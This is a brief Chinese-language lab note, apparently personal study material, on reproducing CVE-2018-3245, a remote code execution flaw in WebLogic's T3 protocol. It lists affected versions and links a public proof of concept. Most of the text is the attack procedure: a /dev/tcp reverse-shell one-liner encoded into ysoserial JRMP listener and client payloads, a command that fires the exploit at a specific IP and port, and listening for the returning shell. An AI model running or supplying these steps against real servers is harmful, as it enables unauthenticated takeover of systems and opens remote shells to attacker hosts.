【初级】weblogic 远程代码执行

CVE-2018-3245
漏洞描述：WebLogic Server使用T3协议在WebLogic Server和客户端间传输数据和通信，由于WebLogic的T3协议和Web协议使用相同的端口，导致在默认情况下，WebLogic Server T3协议通信和Web端具有相同的访问权限。 易受攻击的WebLogic服务允许未经身份验证的攻击者通过T3网络访问及破坏Oracle WebLogic Server。此漏洞的成功攻击可能导致攻击者接管Oracle WebLogic Server，造成远程代码执行。
影响范围：
WebLogic 10.3.6.0
WebLogic 12.1.3.0
WebLogic 12.2.1.3
POC：https://github.com/pyn3rd/CVE-2018-3245

参考资料：https://blog.csdn.net/weixin_42575797/article/details/125542504

复现：

• 不知道为什么复现失败，可能是防火墙没关

关闭防火墙

• VPS输入

• sh -i >& /dev/tcp/ip/11000 0>&1 -> base64 编码
  • java -cp ysoserial-cve-2018-2893.jar ysoserial.exploit.JRMPListener 1099 Jdk7u21 “bash -c {echo,上方第一条命令的base64编码}|{base64,-d}|{bash,-i}”
• 再输入
  • java -jar ysoserial-cve-2018-3245.jar JRMPClient “vps_ip:1099” > poc.ser
• 再运行
  • python2 weblogic.py 123.58.224.8 34175 poc.ser
• 监听11000端口